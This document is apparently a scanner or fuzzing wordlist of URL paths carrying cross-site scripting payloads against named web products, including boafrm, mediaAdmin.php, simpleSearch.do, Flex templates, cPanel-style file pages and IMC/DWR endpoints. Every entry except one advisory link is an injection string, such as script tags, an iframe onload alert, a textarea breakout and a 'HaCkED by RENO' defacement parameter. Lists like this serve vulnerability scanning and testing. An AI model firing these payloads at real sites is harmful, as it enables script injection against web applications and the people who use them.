boafrm/=%3E%3Cscript%3E
boafrm/=%22%3E%3Cscript%3E
boafrm/=%27%3E%3Cscript%3E
boafrm/==22 3e 3c
admin/mediaAdmin.php?id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
admin/mediaAdmin.php?ID=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
admin/mediaAdmin.php?Id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
profiles/html/simpleSearch.do?/name=test&IMG/Ui
profiles/html/simpleSearch.do?/name=test&SCRIPT/Ui
profiles/html/simpleSearch.do?/name=test&SRC/Ui
profiles/html/simpleSearch.do?/name=test&onkey/Ui
profiles/html/simpleSearch.do?/name=test&onmouse/Ui
profiles/html/simpleSearch.do?/name=test&onload/Ui
Flex/index.template.html?/></object><script>alert('XSS')</script>
Flex/index.template.html?/></object><script>alert('XSS')</script>
tools.cisco.com/security/center/viewAlert.x?alertId=18442
frontend/x3/files/fileop.html?opdir=/example/path&opfile=file_name_example&fileop=XSS
frontend/x3/files/dofileop.html?fileop=&opdir=&opfile=&dir=%2fhome%2fuser%2ftmp&fileop=HaCkED%20by%20RENO
imc/login.jsf?loginForm%3a_link_hidden_=&javax.faces.ViewState=%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E
imc/dwr/call/plaincall/blah?callCount=<script>alert(1)</script>
imc/dwr/interface/<script>alert(1)</script>
